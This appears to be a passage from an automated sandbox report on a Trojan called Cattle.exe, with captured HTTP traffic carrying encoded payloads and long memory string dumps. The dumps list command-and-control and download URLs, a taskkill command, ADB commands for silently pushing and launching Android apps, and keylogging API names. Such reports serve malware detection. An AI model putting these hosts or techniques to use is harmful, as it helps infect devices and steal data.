Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:30 GMT

Content-Type: text/plain

Content-Length: 185696

Last-Modified: Tue, 19 May 2015 04:05:51 GMT

Connection: close

ETag: "555ab69f-2d560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimnTp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJAaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfezaJwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr

<<< skipped >>>

GET /txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:33 GMT

Content-Type: text/plain

Content-Length: 981316

Last-Modified: Fri, 06 Nov 2015 14:21:22 GMT

Connection: close

ETag: "563cb762-ef944"

Accept-Ranges: bytes

fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCpCw//ZtlXeqL0Oq8hXmhS1dbIATI0j4H7hDmNhxfqBCuL8cMOpsqNVzNxLIKG5qZSBSuCn5fx0f5/ 1gVd/aPP9SOom WIpKohgOc l04FPz0GxiLEfhYTCxM4/qK98WfgaoYEWng/qVMRYJchKrjV27X9yjCsrj/nl7eyOl1GODLoPv9LNgJfCygIPvfQmf9Yasux9OxPN4R8Qn8NqxFalNvYESg2EtfHr7qnITxIETLkPSHK/J7NMbXnIvNHRyM4KOTUbl1IC4k7gkoWb2hooyOsK5E3V 3nLwnD/jdjjV9VvGoips7HiZZ7YpDZ0vb6ilBLhvc7kX6 lesXzT6wd3jt6gSOucIAP3AppOCQFLnZiT96Kv ERmY8pUqO75F3fxKwsZxZX08DnNfkCje6 IpytI1JqNdmE0ulS19g2FokFVFNhu9B MRI0rv1TZZqup5rKw7rq9cL2R7QL6w ffUtPl9E53YRfnIoPPhpwmxXZ68c6AzqLD/xO2/dVGEIC671vaGohXFr S644o0iHKKw1Naj7KPLwTvcIsrO2 3QjGij9Vgih1ZzWMaq7OnX4EM2fUJjB/3b/jVCIu263OFJR9eWl1wZehrcaQnMZEEjgeZvuc1YJE9t2ctzG332utSBEuw04QgLrvW9oaiGQ2s4RSCXYkeTMIGFnVTEBg036c88SGDCftSG8n5DjNv4Uen03mn8I8vBO9wiys7Jc4v/zYZvkpBKinkhtiwZadfgQzZ9QmMrFe huETw2Vr0RuTs Y6Bbbs7cMiCJ4EoQ/DLIvFbwzR02aH9CcpjNB3YSiQv9k83nwMCytatubl57h/kw7k tEZ0CLLBenWWV3745fWYk2s7t8bZ/NJsvnyku5NNfvVhIV/YOVE9gxgkT23Zy3MbQ7iYzErPcsmJ6HScuGiYesj0B4xlHjNxqq6DTrmKtEQlEb7gGIas6RGauP1vWaua48/9zYD9ICXJ4ENgI/IsXv58pLuTTX71aY9BHiIyyaJYJE9t2ctzG0ADeVWoFMJw3aGCG39/O Dmin1S89u Ag/xciG6s92SqqLnTP0Y6h0taGu Eiv44BPcQ1vqgkBt6nb/eyVqJW7T2xoy2CTrJhj30bEi6UmXENleioU6zhjNrVu1/rdLIHidULQgw4/OY8vBO9wiys7ea/ixrWbXHS7ZuZVM5xCTw jKk SLSSdw062PGxKZU2PaahO6Lc7qM2u9iEC5DZKSRMLkfCDzYge3s7/Ba78SUZq4/W9Zq5r5D9yfW ufdob7sixSPg5M0Zq4/W9Zq5rUX5yXwB 1/9gkT23Zy3MbfS0dnBMwsSQJ6HScuGiYes2z53ycDjwMPfWjfpAjdmZnJCGKbiAAVZIZpQP5BcrAsKg9VYCq5CbZir9ebxZqgVYLhY7ig9a6lvcrHt96Z1JpY9ReulnBfleVTvCunHEXPnyku5NNfvVcfP7aaDPJ00l6fTdDKJcBM0eReDfMeDa

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

Cattle.exe_3444:

`.rsrc

t.hP4S

t.hd:S

tWSShW

tl9_ tgSSh

u$SShe

@ SSHPWj

j%XtL9E

tAHt.HHt

t'SShl

SSSSh`

FTCP

FtPW

SSh@B

CNotSupportedException

CHttpFile

hXXp://

kernel32.dll

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

comctl32.dll

comdlg32.dll

shell32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

RegOpenKeyTransactedA

Advapi32.dll

RegCreateKeyTransactedA

RegDeleteKeyTransactedA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

ole32.dll

RegDeleteKeyExA

user32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

commctrl_DragListMsg

CCmdTarget

MFCLink_UrlPrefix

MFCLink_Url

Shell32.dll

%s:%x:%x:%x:%x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

&%d %s

Hex={X,X,X}

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

ShowCmd

%sMFCToolBar-%d%x

%sMFCToolBar-%d

%sMFCToolBarParameters

TOOLBAR_RESETKEYBAORD

CMDITabProxyWnd

CMDIChildWndEx

CMDIFrameWndEx

KeyboardManager

MSG_CHECKEMPTYMINIFRAME

%sDockingManager-%d

%sPane-%d%x

%sPane-%d

%c%d%c%s

RGB(%d, %d, %d)

%sBasePane-%d%x

%sBasePane-%d

windows

CMDIChildWnd

CMDIFrameWnd

CMDIClientAreaWnd

%sMDIClientArea-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

CMFCToolBarsKeyboardPropertyPage

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

ENABLE_KEYS

KEYS_MENU

KEYS

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

code %d bits %d->%d

gen_codes: max_code %d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

-.zip

-1.1.3

1.1.3

%s%s%s

Correct password required

1.2.8

zerr=%d Z_STREAM_END=%d total_out=%lu

entryCount=%d

x-xx-xxxx-xxxx

XXXXXXXXXXX

%d(lo-client:%s%d)

%d(%s)

%s%s/

cannot open '%s': %s

cannot stat '%s': %s

skipping special file '%s'

cannot read '%s': %s

error seeking in file '%s'

could not allocate buffer for '%s'

error reading from file: '%s'

file '%s' is not a valid zip file

AndroidManifest.xml

file '%s' does not contain AndroidManifest.xml

failed to copy '%s' to '%s': %s

%spush: %s -> %s

%d file%s pushed. %d file%s skipped.

error: %s

%s/%s

hXXp://app.miaoxia8.com/driver/

c:\windows\temp

%s\%s

DPInst.exe

\DPInst.exe

xm32.zip

xm64.zip

ua32.zip

ua64.zip

:%d: %s

0xX,

can't find '%s' to install

can't install '%s' because it's not a file

shell:am start -n %s

shell:input keyevent 3

/data/local/tmp/%s

/sdcard/tmp/%s

--key

host-serial:%s:%s

%s:%s

ANDROID_ADB_SERVER_PORT

adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"

VID:%s

Zip EOCD: expected >= %d bytes, found %d

EOCD(%d) comment(%d) exceeds len (%d)

Archive spanning not supported

protocol fault (status x x x x?!)

host:transport:%s

transport-usb

transport-local

transport-any

host:%s

TscServer.exe

Windows

PID:%s

127.0.0.1

taskkill /f /im %s

%s\adb.ini

hXXp://cfg.app.soomeng.com/cfg/adb.ini

?MAC=%s&PID=%s

adb.ini

APPURL

/TscServer.exe

ShellRun%s/%s

iphlpapi.dll

AllocateAndGetTcpExTableFromStack

InternalGetTcpTable2

transport

XXXXXX

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

c:\app\Call.pdb

.PAVCFileException@@

.PAVCException@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCInternetException@@

.?AVCHttpFile@@

.PAVCOleException@@

.PAVCArchiveException@@

.?AVCCmdTarget@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMFCToolBarCmdUI@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÃ

c:\windows\temp\Cattle.exe

06/02/2011

000000000000

Keyboard

[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]

1000_1234

PeekNamedPipe

GetProcessHeap

GetCPInfo

GetWindowsDirectoryA

Reporte_Dispatch

RegQueryInfoKeyA

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetViewportExtEx

GdiplusShutdown

ShellExecuteA

UrlUnescapeA

URLDownloadToFileA

GetAsyncKeyState

MapVirtualKeyA

SetWindowsHookExA

GetKeyState

CreateDialogIndirectParamA

GetKeyNameTextA

UnhookWindowsHookEx

MapVirtualKeyExA

GetKeyboardLayout

GetKeyboardState

HttpQueryInfoA

InternetCanonicalizeUrlA

InternetCrackUrlA

InternetOpenUrlA

2;%SK

`#T##.#.WA3#-3&

.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#

$###$-1?

2 (;%(10

$,0(,$($,000 ,$ $

.text

`.rdata

@.data

.rsrc

@.reloc

.iLiw-Z

41;.Hx

,"G.Ar#_

.zCN,-6[(

`.rdml>

KERNEL32.DLL

adbWinpi.dll

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

gdiplus.dll

IMM32.dll

IPHLPAPI.DLL

MSIMG32.dll

OLEACC.dll

OLEAUT32.dll

SETUPAPI.dll

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

@WININET.DLL

accKeyboardShortcut

hhctrl.ocx

dwmapi.dll

UxTheme.dll

USER32.DLL

NRICHED20.DLL

mscoree.dll

ekernel32.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

manufacturer:%s

product name:%s

version:%s

serial number:%s

last wake-up event:%s

uuid:x-xx-xxxx-xxxx

sku number:%s

family:%s

Cattle.exe_3444_rwx_00401000_001FB000:

t.hP4S

t.hd:S

tWSShW

tl9_ tgSSh

u$SShe

@ SSHPWj

j%XtL9E

tAHt.HHt

t'SShl

SSSSh`

FTCP

FtPW

SSh@B

CNotSupportedException

CHttpFile

hXXp://

kernel32.dll

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

comctl32.dll

comdlg32.dll

shell32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

RegOpenKeyTransactedA

Advapi32.dll

RegCreateKeyTransactedA

RegDeleteKeyTransactedA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

ole32.dll

RegDeleteKeyExA

user32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

commctrl_DragListMsg

CCmdTarget

MFCLink_UrlPrefix

MFCLink_Url

Shell32.dll

%s:%x:%x:%x:%x

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

&%d %s

Hex={X,X,X}

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

ShowCmd

%sMFCToolBar-%d%x

%sMFCToolBar-%d

%sMFCToolBarParameters

TOOLBAR_RESETKEYBAORD

CMDITabProxyWnd

CMDIChildWndEx

CMDIFrameWndEx

KeyboardManager

MSG_CHECKEMPTYMINIFRAME

%sDockingManager-%d

%sPane-%d%x

%sPane-%d

%c%d%c%s

RGB(%d, %d, %d)

%sBasePane-%d%x

%sBasePane-%d

windows

CMDIChildWnd

CMDIFrameWnd

CMDIClientAreaWnd

%sMDIClientArea-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

CMFCToolBarsKeyboardPropertyPage

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

ENABLE_KEYS

KEYS_MENU

KEYS

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

code %d bits %d->%d

gen_codes: max_code %d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

-.zip

-1.1.3

1.1.3

%s%s%s

Correct password required

1.2.8

zerr=%d Z_STREAM_END=%d total_out=%lu

entryCount=%d

x-xx-xxxx-xxxx

XXXXXXXXXXX

%d(lo-client:%s%d)

%d(%s)

%s%s/

cannot open '%s': %s

cannot stat '%s': %s

skipping special file '%s'

cannot read '%s': %s

error seeking in file '%s'

could not allocate buffer for '%s'

error reading from file: '%s'

file '%s' is not a valid zip file

AndroidManifest.xml

file '%s' does not contain AndroidManifest.xml

failed to copy '%s' to '%s': %s

%spush: %s -> %s

%d file%s pushed. %d file%s skipped.

error: %s

%s/%s

hXXp://app.miaoxia8.com/driver/

c:\windows\temp

%s\%s

DPInst.exe

\DPInst.exe

xm32.zip

xm64.zip

ua32.zip

ua64.zip

:%d: %s

0xX,

can't find '%s' to install

can't install '%s' because it's not a file

shell:am start -n %s

shell:input keyevent 3

/data/local/tmp/%s

/sdcard/tmp/%s

--key

host-serial:%s:%s

%s:%s

ANDROID_ADB_SERVER_PORT

adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"

VID:%s

Zip EOCD: expected >= %d bytes, found %d

EOCD(%d) comment(%d) exceeds len (%d)

Archive spanning not supported

protocol fault (status x x x x?!)

host:transport:%s

transport-usb

transport-local

transport-any

host:%s

TscServer.exe

Windows

PID:%s

127.0.0.1

taskkill /f /im %s

%s\adb.ini

hXXp://cfg.app.soomeng.com/cfg/adb.ini

?MAC=%s&PID=%s

adb.ini

APPURL

/TscServer.exe

ShellRun%s/%s

iphlpapi.dll

AllocateAndGetTcpExTableFromStack

InternalGetTcpTable2

transport

XXXXXX

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

c:\app\Call.pdb

.PAVCFileException@@

.PAVCException@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCInternetException@@

.?AVCHttpFile@@

.PAVCOleException@@

.PAVCArchiveException@@

.?AVCCmdTarget@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@

.?AVCMFCToolBarCmdUI@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@

.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÃ

c:\windows\temp\Cattle.exe

06/02/2011

000000000000

Keyboard

[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]

1000_1234

PeekNamedPipe

GetProcessHeap

GetCPInfo

GetWindowsDirectoryA

Reporte_Dispatch

RegQueryInfoKeyA

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetViewportExtEx

GdiplusShutdown

ShellExecuteA

UrlUnescapeA

URLDownloadToFileA

GetAsyncKeyState

MapVirtualKeyA

SetWindowsHookExA

GetKeyState

CreateDialogIndirectParamA

GetKeyNameTextA

UnhookWindowsHookEx

MapVirtualKeyExA

GetKeyboardLayout

GetKeyboardState

HttpQueryInfoA

InternetCanonicalizeUrlA

InternetCrackUrlA

InternetOpenUrlA

2;%SK

`#T##.#.WA3#-3&

.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#

$###$-1?

2 (;%(10

$,0(,$($,000 ,$ $

.text

`.rdata

@.data

.rsrc

@.reloc

.iLiw-Z

41;.Hx

,"G.Ar#_

.zCN,-6[(

@WININET.DLL

accKeyboardShortcut

hhctrl.ocx

KERNEL32.DLL

dwmapi.dll

UxTheme.dll

USER32.DLL

NRICHED20.DLL

mscoree.dll

ekernel32.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

manufacturer:%s

product name:%s

version:%s

serial number:%s

last wake-up event:%s

uuid:x-xx-xxxx-xxxx

sku number:%s

family:%s

Cattle.exe_3444_rwx_10018000_0002F000:

%F*>#

kN]%X

: L.xx_

Tf.rh

%CTyN(

.Qzpmz

Uexe

.Ru-]

BuFtp>

.QZ`s

Explorer.EXE_1572_rwx_00EF0000_00005000:

%WinDir%\HpE\wow64\rebuild.exe

%Program Files%\tango3\tango3.exe

wmsvcrt

WinExec

ShellExecuteExA

ShellExecuteExW

OpenWindowStationA

OpenWindowStationW

SetProcessWindowStation

GetProcessWindowStation

CloseWindowStation

EnumWindows

EnumThreadWindows

EnumChildWindows

RegOpenKeyExA

RegOpenKeyExW

RegEnumKeyExA

RegEnumKeyExW

RegDeleteKeyA

RegDeleteKeyW

RegCloseKey

HttpOpenRequestA

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestW

HttpQueryInfoA

HttpQueryInfoW

UrlUnescapeA

UrlUnescapeW

Explorer.EXE_1572_rwx_00FF0000_00004000:

%System%\LQdhJ\yYJSx.exe

wmsvcrt

WinExec

ShellExecuteExA

ShellExecuteExW

OpenWindowStationA

OpenWindowStationW

SetProcessWindowStation

GetProcessWindowStation

CloseWindowStation

EnumWindows

EnumThreadWindows

EnumChildWindows

RegOpenKeyExA

RegOpenKeyExW

RegEnumKeyExA

RegEnumKeyExW

RegDeleteKeyA

RegDeleteKeyW

RegCloseKey

HttpOpenRequestA

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestW

HttpQueryInfoA

HttpQueryInfoW

UrlUnescapeA

UrlUnescapeW